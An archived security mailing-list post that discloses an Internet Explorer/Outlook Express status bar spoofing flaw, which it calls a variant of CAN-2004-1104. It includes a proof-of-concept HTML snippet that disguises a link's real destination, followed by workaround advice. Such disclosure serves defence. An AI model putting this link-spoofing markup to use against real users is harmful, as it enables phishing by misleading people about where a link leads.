[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY16-F274238AB780F3610DF2A36B96D0@phx.gbl>
From: bitlance_3 at hotmail.com (winter bitlance)
Subject: IE/OE Restricted Zone Status Bar Spoofing
Hi LIST.
It is normally possible for script code to manipulate information displayed
in the status bar in the Internet Zone. By default, Outlook Express 6 open
HTML e-mail messages in the Restricted sites zone instead of the Internet
Zone. Outlook Express users may especially trust information displayed in
the status bar since HTML documents are viewed in context of the
"Restricted" zone, which has scripting support disabled.
However, errors in Internet Explorer allows manipulation of the status bar
without using any script code. This can be exploited by embedding a
specially crafted form in a link.
http-equiv has discovered a weakness in Internet Explorer, which
potentially can be exploited by malicious people to trick users into
visiting a malicious website which facilitates a "phishing" attack. (
CAN-2004-1104 )
Now another weakness which use a "label for id trick" has been discovered.
This weakness is a variant of CAN-2004-1104.
Example:
- -----8<----- -----8<----- -----8<----- -----8<-----
[!-- saved from url=(0007)http:// -->
[body style="color: WindowText; background-color: Window;">
[div>IE/OE Restricted Zone Status Bar Spoofing[/div>
[div>Tested on Windows XP with SP2 installed.[/div>
[p>[a id="SPOOF" href="http://www.example.com/?maliciouscontents">[/a>[/p>
[div>
[a href="http://www.microsoft.com/windows/default.mspx">
[table>
[caption>
[a href="http://www.microsoft.com/windows/default.mspx ">
[label for="SPOOF">
[u style="cursor: pointer; color: blue">
http://www.microsoft.com/windows/default.mspx
[/u>
[/label>
[/a>
[/caption>
[/table>
[/a>
[/div>
- -----8<----- -----8<----- -----8<----- -----8<-----
workaround:( on Windows XP Service Pack 2 )
You can change the zone elevation setting under for each security zone by
configuring the following option from Allow to Disabled or Prompt in the
Custom Level Security dialog.
"Web sites in less privileged Web content zones can navigate into this
zone"
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx
Solution:
Never follow links from untrusted sources.
Read e-mail messages in plain text format if you are using Outlook Express
6 SP1 or a later version , to help protect yourself from the HTML e-mail
attack vector.
REGARDS.
--
bitlance winter
_________________________________________________________________
????250MB??????? ?MSN Hotmail? http://www.hotmail.com/
Powered by blists - more mailing lists